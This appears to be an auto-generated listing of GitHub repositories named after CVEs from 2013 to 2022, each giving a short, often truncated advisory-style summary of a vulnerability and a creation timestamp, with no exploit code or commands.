**WiseConnect - ScreenConnect Session Code Bypass. An attacker would have to use a proxy to monitor the traffic, and perform a brute force on the session code in order to get in. Sensitive data about the company , get in a session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36781](https://github.com/Live-Hack-CVE/CVE-2022-36781) create time: 2022-12-28T10:56:23Z

**The Migration, Backup, Staging WordPress plugin before 0.9.76 does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2863](https://github.com/Live-Hack-CVE/CVE-2022-2863) create time: 2022-12-28T10:56:08Z

**In affected versions of Octopus Server it was identified that the same encryption process was used for both encrypting session cookies and variables. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2781](https://github.com/Live-Hack-CVE/CVE-2022-2781) create time: 2022-12-28T10:56:00Z

**PJSIP is a free and open source multimedia communication library written in C. When processing certain packets, PJSIP may incorrectly switch from using SRTP media transport to using basic RTP upon SRTP restart, causing the media to be sent insecurely. The vulnerability impacts all PJSIP users that use SRTP. The patch i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39269](https://github.com/Live-Hack-CVE/CVE-2022-39269) create time: 2022-12-28T10:55:53Z

**PJSIP is a free and open source multimedia communication library written in C. In versions of PJSIP prior to 2.13 the PJSIP parser, PJMEDIA RTP decoder, and PJMEDIA SDP parser are affeced by a buffer overflow vulnerability. Users connecting to untrusted clients are at risk. This issue has been patched and is available CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39244](https://github.com/Live-Hack-CVE/CVE-2022-39244) create time: 2022-12-28T10:55:50Z

**An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in iOS 15.6 and iPadOS 15.6, macOS Big Sur 11.6.8, tvOS 15.6, macOS Monterey 12.5, Security Update 2022-005 Catalina. An app may be able to access sensitive user information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32849](https://github.com/Live-Hack-CVE/CVE-2022-32849) create time: 2022-12-28T10:55:46Z

**DiscoTOC is a Discourse theme component that generates a table of contents for topics. Users that can create topics in TOC-enabled categories (and have sufficient trust level - configured in component's settings) are able to inject arbitrary HTML on that topic's page. The issue has been fixed on the `main` branch. Admi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39270](https://github.com/Live-Hack-CVE/CVE-2022-39270) create time: 2022-12-28T10:55:42Z

**Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3002](https://github.com/Live-Hack-CVE/CVE-2022-3002) create time: 2022-12-28T10:55:39Z

**Wedding Planner v1.0 is vulnerable to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42075](https://github.com/Live-Hack-CVE/CVE-2022-42075) create time: 2022-12-28T10:55:24Z

**Enabling and disabling installed H5P libraries did not include the necessary token to prevent a CSRF risk. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2986](https://github.com/Live-Hack-CVE/CVE-2022-2986) create time: 2022-12-28T10:55:20Z

**dparse is a parser for Python dependency files. dparse in versions before 0.5.2 contain a regular expression that is vulnerable to a Regular Expression Denial of Service. All the users parsing index server URLs with dparse are impacted by this vulnerability. A patch has been applied in version `0.5.2`, all the users ar CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39280](https://github.com/Live-Hack-CVE/CVE-2022-39280) create time: 2022-12-28T10:55:10Z

**SAP BusinessObjects BI LaunchPad - versions 420, 430, is susceptible to script execution attack by an unauthenticated attacker due to improper sanitization of the user inputs while interacting on the network. On successful exploitation, an attacker can view or modify information causing a limited impact on confidential CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39800](https://github.com/Live-Hack-CVE/CVE-2022-39800) create time: 2022-12-28T10:55:06Z

**Generex CS141 through 2.10 allows remote command execution by administrators via a web interface that reaches run_update in /usr/bin/gxserve-update.sh (e.g., command execution can occur via a reverse shell installed by install.sh). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42457](https://github.com/Live-Hack-CVE/CVE-2022-42457) create time: 2022-12-28T10:54:52Z

**Windows CNG Key Isolation Service Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41125](https://github.com/Live-Hack-CVE/CVE-2022-41125) create time: 2022-12-28T10:53:50Z

**The WP Hide WordPress plugin through 0.0.2 does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3489](https://github.com/Live-Hack-CVE/CVE-2022-3489) create time: 2022-12-28T10:53:47Z

**The Complianz WordPress plugin before 6.3.4, and Complianz Premium WordPress plugin before 6.3.6 allow a translators to inject arbitrary SQL through an unsanitized translation. SQL can be injected through an infected translation file, or by a user with a translator role through translation plugins such as Loco Translat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3494](https://github.com/Live-Hack-CVE/CVE-2022-3494) create time: 2022-12-28T10:53:44Z

**Use-after-free vulnerability in the Web Workers implementation in Google Chrome before 32.0.1700.76 on Windows and before 32.0.1700.77 on Mac OS X and Linux allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the shutting down of a worker process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6646](https://github.com/Live-Hack-CVE/CVE-2013-6646) create time: 2022-12-28T10:16:28Z

**Use-after-free vulnerability in the OnWindowRemovingFromRootWindow function in content/browser/web_contents/web_contents_view_aura.cc in Google Chrome before 32.0.1700.76 on Windows and before 32.0.1700.77 on Mac OS X and Linux allows user-assisted remote attackers to cause a denial of service or possibly have unspecif CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6645](https://github.com/Live-Hack-CVE/CVE-2013-6645) create time: 2022-12-28T10:16:07Z

**Use-after-free vulnerability in the FormAssociatedElement::formRemovedFromTree function in core/html/FormAssociatedElement.cpp in Blink, as used in Google Chrome before 32.0.1700.76 on Windows and before 32.0.1700.77 on Mac OS X and Linux, allows remote attackers to cause a denial of service or possibly have unspecifie CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6641](https://github.com/Live-Hack-CVE/CVE-2013-6641) create time: 2022-12-28T10:16:03Z

**Multiple unspecified vulnerabilities in Google Chrome before 32.0.1700.76 on Windows and before 32.0.1700.77 on Mac OS X and Linux allow attackers to cause a denial of service or possibly have other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6644](https://github.com/Live-Hack-CVE/CVE-2013-6644) create time: 2022-12-28T10:15:58Z

**The PointerCompare function in codegen.cc in Seccomp-BPF, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, does not properly merge blocks, which might allow remote attackers to bypass intended sandbox restrictions by leveraging renderer access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1733](https://github.com/Live-Hack-CVE/CVE-2014-1733) create time: 2022-12-28T10:16:54Z

**Use-after-free vulnerability in browser/ui/views/speech_recognition_bubble_views.cc in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux allows remote attackers to cause a denial of service or possibly have unspecified other impact via an INPUT element that triggers the presence o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-1732](https://github.com/Live-Hack-CVE/CVE-2014-1732) create time: 2022-12-28T10:16:43Z

**Multiple cross-site request forgery (CSRF) vulnerabilities in the Simple Share Buttons Adder plugin before 4.5 for WordPress allow remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the (1) ssba_share_text parameter in a save action to wp-adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-4717](https://github.com/Live-Hack-CVE/CVE-2014-4717) create time: 2022-12-28T09:33:29Z

**The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0160](https://github.com/Live-Hack-CVE/CVE-2014-0160) create time: 2022-12-28T09:30:04Z

**Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-1019](https://github.com/Live-Hack-CVE/CVE-2016-1019) create time: 2022-12-28T10:16:11Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4283](https://github.com/Live-Hack-CVE/CVE-2016-4283) create time: 2022-12-28T10:15:54Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4284](https://github.com/Live-Hack-CVE/CVE-2016-4284) create time: 2022-12-28T10:15:51Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4285](https://github.com/Live-Hack-CVE/CVE-2016-4285) create time: 2022-12-28T10:15:47Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4280](https://github.com/Live-Hack-CVE/CVE-2016-4280) create time: 2022-12-28T10:15:22Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4281](https://github.com/Live-Hack-CVE/CVE-2016-4281) create time: 2022-12-28T10:15:18Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4282](https://github.com/Live-Hack-CVE/CVE-2016-4282) create time: 2022-12-28T10:15:15Z

**Integer overflow in Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4287](https://github.com/Live-Hack-CVE/CVE-2016-4287) create time: 2022-12-28T10:15:11Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2016-4271 and CVE-2016-4278. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4277](https://github.com/Live-Hack-CVE/CVE-2016-4277) create time: 2022-12-28T10:15:06Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6924](https://github.com/Live-Hack-CVE/CVE-2016-6924) create time: 2022-12-28T10:15:02Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4276, CVE-2016-428 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4275](https://github.com/Live-Hack-CVE/CVE-2016-4275) create time: 2022-12-28T10:06:57Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2016-4277 and CVE-2016-4278, aka a "local CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4271](https://github.com/Live-Hack-CVE/CVE-2016-4271) create time: 2022-12-28T10:06:50Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4275, CVE-2016-4276, CVE-2016-428 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-4274](https://github.com/Live-Hack-CVE/CVE-2016-4274) create time: 2022-12-28T10:06:46Z

**Adobe Flash Player before 18.0.0.375 and 19.x through 23.x before 23.0.0.162 on Windows and OS X and before 11.2.202.635 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4274, CVE-2016-4275, CVE-2016-427 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-6922](https://github.com/Live-Hack-CVE/CVE-2016-6922) create time: 2022-12-28T10:06:40Z

**Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-12207](https://github.com/Live-Hack-CVE/CVE-2018-12207) create time: 2022-12-28T10:12:29Z

**Bookly #1 WordPress Booking Plugin Lite before 14.5 has XSS via a jQuery.ajax request to ng-payment_details_dialog.js. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6891](https://github.com/Live-Hack-CVE/CVE-2018-6891) create time: 2022-12-28T10:11:21Z

**D-Link COVR-2600R and COVR-3902 Kit before 1.01b05Beta01 use hardcoded credentials for telnet connection, which allows unauthenticated attackers to gain privileged access to the router, and to extract sensitive data or modify the configuration. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20432](https://github.com/Live-Hack-CVE/CVE-2018-20432) create time: 2022-12-28T09:23:45Z

**Improper conditions check in the voltage modulation interface for some Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11139](https://github.com/Live-Hack-CVE/CVE-2019-11139) create time: 2022-12-28T10:12:25Z

**A remote code execution vulnerability exists when the IOleCvt interface renders ASP webpage content, aka 'Windows IOleCvt Interface Remote Code Execution Vulnerability'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0845](https://github.com/Live-Hack-CVE/CVE-2019-0845) create time: 2022-12-28T09:32:32Z

**HTTP request smuggling in Node.js 10, 12, and 13 causes malicious payload delivery when transfer-encoding is malformed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15605](https://github.com/Live-Hack-CVE/CVE-2019-15605) create time: 2022-12-28T09:29:00Z

**Incorrect alias information in IonMonkey JIT compiler for setting array elements could lead to a type confusion. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 68.4.1, Thunderbird < 68.4.1, and Firefox < 72.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17026](https://github.com/Live-Hack-CVE/CVE-2019-17026) create time: 2022-12-28T09:28:56Z

**Improper Certificate Validation in Node.js 10, 12, and 13 causes the process to abort when sending a crafted X.509 certificate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15604](https://github.com/Live-Hack-CVE/CVE-2019-15604) create time: 2022-12-28T09:28:29Z

**The packaging of inn on SUSE Linux Enterprise Server 11; openSUSE Factory, Leap 15.1 allows local attackers to escalate from user inn to root via symlink attacks. This issue affects: SUSE Linux Enterprise Server 11 inn version 2.4.2-170.21.3.1 and prior versions. openSUSE Factory inn version 2.6.2-2.2 and prior version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3692](https://github.com/Live-Hack-CVE/CVE-2019-3692) create time: 2022-12-28T09:28:22Z

**All samba versions 4.9.x before 4.9.18, 4.10.x before 4.10.12 and 4.11.x before 4.11.5 have an issue where if it is set with "log level = 3" (or above) then the string obtained from the client, after a failed character conversion, is printed. Such strings can be provided during the NTLMSSP authentication exchange. In t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14907](https://github.com/Live-Hack-CVE/CVE-2019-14907) create time: 2022-12-28T09:28:18Z

**CRLF injection vulnerability in Network Center in Synology Router Manager (SRM) before 1.2.3-8017-2 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via crafted network traffic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11823](https://github.com/Live-Hack-CVE/CVE-2019-11823) create time: 2022-12-28T09:27:56Z

**OpenDMARC through 1.3.2 and 1.4.x, when used with pypolicyd-spf 2.0.2, allows attacks that bypass SPF and DMARC authentication in situations where the HELO field is inconsistent with the MAIL FROM field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-20790](https://github.com/Live-Hack-CVE/CVE-2019-20790) create time: 2022-12-28T09:27:49Z

**A UNIX Symbolic Link (Symlink) Following vulnerability in the mysql-systemd-helper of the mariadb packaging of SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Server 15 allows local attackers to change the permissions of arbitrary files to 0640. This issue affects: SUSE Linux Enterprise Server 12 mariadb version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18901](https://github.com/Live-Hack-CVE/CVE-2019-18901) create time: 2022-12-28T09:27:16Z

**drivers/media/usb/dvb-usb/technisat-usb2.c in the Linux kernel through 5.2.9 has an out-of-bounds read via crafted USB device traffic (which may be remote via usbip or usbredir). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15505](https://github.com/Live-Hack-CVE/CVE-2019-15505) create time: 2022-12-28T09:24:06Z

**Pagure before 5.6 allows XSS via the templates/blame.html blame view. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11556](https://github.com/Live-Hack-CVE/CVE-2019-11556) create time: 2022-12-28T09:24:02Z

**An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest thr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14330](https://github.com/Live-Hack-CVE/CVE-2020-14330) create time: 2022-12-28T10:12:18Z

**A flaw was found in python. In algorithms with quadratic time complexity using non-binary bases, when using int("text"), a system could take 50ms to parse an int string with 100,000 digits and 5s for 1,000,000 digits (float, decimal, int.from_bytes(), and int() for binary bases 2, 4, 8, 16, and 32 are not affected). Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10735](https://github.com/Live-Hack-CVE/CVE-2020-10735) create time: 2022-12-28T10:10:56Z

**An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read and write in DwaCompressor::uncompress in ImfDwaCompressor.cpp when handling the UNKNOWN compression case. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11762](https://github.com/Live-Hack-CVE/CVE-2020-11762) create time: 2022-12-28T10:08:17Z

**An issue was discovered in OpenEXR before 2.4.1. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11759](https://github.com/Live-Hack-CVE/CVE-2020-11759) create time: 2022-12-28T10:07:56Z

**GraphicsMagick through 1.3.35 has a heap-based buffer overflow in ReadMNGImage in coders/png.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12672](https://github.com/Live-Hack-CVE/CVE-2020-12672) create time: 2022-12-28T10:07:52Z

**An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read during Huffman uncompression, as demonstrated by FastHufDecoder::refill in ImfFastHuf.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11761](https://github.com/Live-Hack-CVE/CVE-2020-11761) create time: 2022-12-28T10:07:48Z

**json-c through 0.14 has an integer overflow and out-of-bounds write via a large JSON file, as demonstrated by printbuf_memappend. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12762](https://github.com/Live-Hack-CVE/CVE-2020-12762) create time: 2022-12-28T10:06:18Z

**The VFIO PCI driver in the Linux kernel through 5.6.13 mishandles attempts to access disabled memory space. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12888](https://github.com/Live-Hack-CVE/CVE-2020-12888) create time: 2022-12-28T10:06:14Z

**An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read during RLE uncompression in rleUncompress in ImfRle.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11760](https://github.com/Live-Hack-CVE/CVE-2020-11760) create time: 2022-12-28T10:06:07Z

**An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds write in copyIntoFrameBuffer in ImfMisc.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11764](https://github.com/Live-Hack-CVE/CVE-2020-11764) create time: 2022-12-28T10:05:56Z

**An issue was discovered in OpenEXR before 2.4.1. There is an std::vector out-of-bounds read and write, as demonstrated by ImfTileOffsets.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11763](https://github.com/Live-Hack-CVE/CVE-2020-11763) create time: 2022-12-28T10:05:53Z

**An issue was discovered in ssl.c in Axel before 2.17.8. The TLS implementation lacks hostname verification. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13614](https://github.com/Live-Hack-CVE/CVE-2020-13614) create time: 2022-12-28T10:05:49Z

**yargs-parser could be tricked into adding or modifying properties of Object.prototype using a "__proto__" payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7608](https://github.com/Live-Hack-CVE/CVE-2020-7608) create time: 2022-12-28T09:33:48Z

**In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability was found in retrieval of the current username (in libraries/classes/Server/Privileges.php and libraries/classes/UserPassword.php). A malicious user with access to the server could create a crafted username, and then trick the victim int CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10804](https://github.com/Live-Hack-CVE/CVE-2020-10804) create time: 2022-12-28T09:28:25Z

**A flaw was found in Linux, in targetcli-fb versions 2.1.50 and 2.1.51 where the socket used by targetclid was world-writable. If a system enables the targetclid socket, a local attacker can use this flaw to modify the iSCSI configuration and escalate their privileges to root. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10699](https://github.com/Live-Hack-CVE/CVE-2020-10699) create time: 2022-12-28T09:28:11Z

**A flaw was found in keycloak before version 9.0.1. When configuring an Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle this events. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1744](https://github.com/Live-Hack-CVE/CVE-2020-1744) create time: 2022-12-28T09:28:07Z

**GNU Mailman 2.x before 2.1.30 uses the .obj extension for scrubbed application/octet-stream MIME parts. This behavior may contribute to XSS attacks against list-archive visitors, because an HTTP reply from an archive web server may lack a MIME type, and a web browser may perform MIME sniffing, conclude that the MIME ty CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12137](https://github.com/Live-Hack-CVE/CVE-2020-12137) create time: 2022-12-28T09:27:59Z

**Exim through 4.93 has an out-of-bounds read in the SPA authenticator that could result in SPA/NTLM authentication bypass in auths/spa.c and auths/auth-spa.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12783](https://github.com/Live-Hack-CVE/CVE-2020-12783) create time: 2022-12-28T09:27:52Z

**In phpMyAdmin 4.x before 4.9.5 and 5.x before 5.0.2, a SQL injection vulnerability has been discovered where certain parameters are not properly escaped when generating certain queries for search actions in libraries/classes/Controllers/Table/TableSearchController.php. An attacker can generate a crafted database or tab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10802](https://github.com/Live-Hack-CVE/CVE-2020-10802) create time: 2022-12-28T09:27:45Z

**OpenDMARC through 1.3.2 and 1.4.x allows attacks that inject authentication results to provide false information about the domain that originated an e-mail message. This is caused by incorrect parsing and interpretation of SPF/DKIM authentication results, as demonstrated by the example.net(.example.com substring. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12272](https://github.com/Live-Hack-CVE/CVE-2020-12272) create time: 2022-12-28T09:27:42Z

**A potential DoS flaw was found in the virtio-fs shared file system daemon (virtiofsd) implementation of the QEMU version >= v5.0. Virtio-fs is meant to share a host file system directory with a guest via virtio-fs device. If the guest opens the maximum number of file descriptors under the shared directory, a denial of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10717](https://github.com/Live-Hack-CVE/CVE-2020-10717) create time: 2022-12-28T09:27:31Z

**address_space_map in exec.c in QEMU 4.2.0 can trigger a NULL pointer dereference related to BounceBuffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13659](https://github.com/Live-Hack-CVE/CVE-2020-13659) create time: 2022-12-28T09:26:34Z

**The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8555](https://github.com/Live-Hack-CVE/CVE-2020-8555) create time: 2022-12-28T09:26:30Z

**A malicious guest compromised before a container creation (e.g. a malicious guest image or a guest running multiple containers) can trick the kata runtime into mounting the untrusted container filesystem on any host path, potentially allowing for code execution on the host. This issue affects: Kata Containers 1.11 vers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2026](https://github.com/Live-Hack-CVE/CVE-2020-2026) create time: 2022-12-28T09:26:26Z

**An assertion failure issue was found in the Network Block Device(NBD) Server in all QEMU versions before QEMU 5.0.1. This flaw occurs when an nbd-client sends a spec-compliant request that is near the boundary of maximum permitted request length. A remote nbd-client could use this flaw to crash the qemu-nbd server resu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10761](https://github.com/Live-Hack-CVE/CVE-2020-10761) create time: 2022-12-28T09:26:23Z

**libmariadb/mariadb_lib.c in MariaDB Connector/C before 3.1.8 does not properly validate the content of an OK packet received from a server. NOTE: although mariadb_lib.c was originally based on code shipped for MySQL, this issue does not affect any MySQL components supported by Oracle. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13249](https://github.com/Live-Hack-CVE/CVE-2020-13249) create time: 2022-12-28T09:26:19Z

**An issue was discovered in Icinga2 before v2.12.0-rc1. The prepare-dirs script (run as part of the icinga2 systemd service) executes chmod 2750 /run/icinga2/cmd. /run/icinga2 is under control of an unprivileged user by default. If /run/icinga2/cmd is a symlink, then it will by followed and arbitrary files can be change CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14004](https://github.com/Live-Hack-CVE/CVE-2020-14004) create time: 2022-12-28T09:26:15Z

**A NULL pointer dereference in sanei_epson_net_read in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, aka GHSL-2020-075. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12867](https://github.com/Live-Hack-CVE/CVE-2020-12867) create time: 2022-12-28T09:26:12Z

**In MediaInfoLib in MediaArea MediaInfo 20.03, there is a stack-based buffer over-read in Streams_Fill_PerStream in Multiple/File_MpegPs.cpp (aka an off-by-one during MpegPs parsing). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15395](https://github.com/Live-Hack-CVE/CVE-2020-15395) create time: 2022-12-28T09:26:07Z

**The DRM module has a vulnerability in verifying the secure memory attributes. Successful exploitation of this vulnerability may cause abnormal video playback. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46851](https://github.com/Live-Hack-CVE/CVE-2021-46851) create time: 2022-12-28T10:17:04Z

**The memory management module has the logic bypass vulnerability. Successful exploitation of this vulnerability may affect data confidentiality. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46852](https://github.com/Live-Hack-CVE/CVE-2021-46852) create time: 2022-12-28T10:17:01Z

